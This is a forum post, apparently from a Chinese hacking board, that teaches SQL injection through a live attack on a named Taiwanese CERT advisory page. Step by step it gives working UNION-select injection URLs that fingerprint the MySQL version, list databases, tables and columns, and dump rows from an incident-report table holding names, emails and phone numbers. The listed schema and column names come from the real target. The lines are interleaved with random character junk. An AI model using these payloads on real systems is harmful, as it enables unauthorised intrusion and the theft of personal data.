找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1717|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
% C2 N* _6 `2 ]2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解" z3 }! O7 ], t8 r
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
0 w! p1 X) N" d3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
1 t6 u$ v1 C0 l4 X! s数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。& V# D0 ?% p) s, k+ a. E) q! W
4.判断有没有写权限
  \) C9 \% M1 S' `% {/ Hhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
9 N) z  K6 a+ [) [) d; b! E7 x9 S没办法,手动猜表啦& T. ?4 x+ w  ^1 t, E% i2 ]: \" g
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1) H* V5 I. z3 H9 j
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
; X! t/ Q+ C8 q: ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--7 T( ~' n" [6 v
成功查出所有数据库,国外的黑客就是不一般。数据库如下:$ L7 P& H! ~0 g( f7 N( |2 T
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
& h4 W) Q6 w5 b3 R, g% X6.爆表,爆的是twcert库
9 `1 j2 r; T" H; O  `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
+ E3 [! {7 }3 M# o1 k. }* I% \/ d0 G爆出如下表( a( e- t$ [2 l9 k0 S
downloadfile,irsys,newsdata,secrpt,secrpt_big5
1 h" A4 v" B" B5 v$ d: T7.爆列名,这次爆的是irsys表" J" [5 y* u1 ?9 B3 V" _/ t) i. g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--7 s% N# \7 \9 _  V4 l* H% b
爆出如下列
  E, F- C0 N' R; h5 d% o, Iir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 d) U# L& X- m. O3 h, B8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
  ~7 }$ d; N$ _# Nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--$ G6 ?& m: u# l) t3 D# V# E6 \' M
返回是3,说明每个列里有3个地段# s% I, I7 z3 ]2 S+ v1 T' s
9.爆字段内容% ?! `5 f8 F- _& f( H
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--# W  j! {* P5 k  y" C8 Y4 i6 s" L/ m
爆出name列的第一个字段的内容2 ^  [; z2 h6 j6 j0 K' m  ~5 r/ C
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
8 R5 |) y, a' _  w爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表